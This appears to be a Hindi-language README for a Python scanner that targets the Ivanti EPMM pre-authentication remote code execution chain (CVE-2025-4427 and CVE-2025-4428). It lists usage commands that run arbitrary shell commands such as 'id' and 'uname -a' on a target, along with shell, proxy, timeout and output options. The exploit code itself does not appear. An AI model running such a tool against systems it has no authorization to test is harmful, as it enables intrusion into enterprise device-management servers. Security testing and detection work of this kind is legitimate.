
Ivanti EPMM प्री-ऑथ RCE श्रृंखला
CVE-2025-4427 और CVE-2025-4428 एक्सप्लॉइट श्रृंखला के प्रति संवेदनशील सिस्टम की पहचान करने के लिए उन्नत पहचान उपकरण। यह सुरक्षा स्कैनर संवेदनशील एंडपॉइंट्स की पहचान करने में मदद करता है और प्रूफ-ऑफ-कॉन्सेप्ट (PoC) एक्सप्लॉइटेशन प्रदर्शित करता है।
आवश्यकताएँ:
निर्भरताएँ स्थापित करें:
pip install requests
python scanner.py -H http://target-site.com/
python scanner.py -H [TARGET_URL] [OPTIONS]
python scanner.py -H https://example.com/
python scanner.py -H http://internal-server/ -c "uname -a" -x http://proxy:8080
python scanner.py -H http://test-site.com/ -s sh -t 30 -o results.txt
| कोड | विवरण |
|---|---|
| 0 | संवेदनशील सिस्टम का पता चला |
| 1 | कोई भेद्यता नहीं मिली |
| 2 | निष्पादन त्रुटि हुई |
MIT लाइसेंस के तहत वितरित। पूर्ण पाठ के लिए LICENSE देखें।
| पैरामीटर | विवरण |
|---|
| -H | लक्ष्य URL (आवश्यक) |
| -c | निष्पादित करने के लिए कमांड (डिफ़ॉल्ट: 'id') |
| -s | शेल प्रकार [bash |
| -x | प्रॉक्सी कॉन्फ़िगरेशन (जैसे: http://127.0.0.1:8080) |
| -t | सेकंड में अनुरोध टाइमआउट (डिफ़ॉल्ट: 15) |
| -r | कनेक्शन पुनः प्रयास (डिफ़ॉल्ट: 2) |
| -o | आउटपुट फ़ाइल पथ |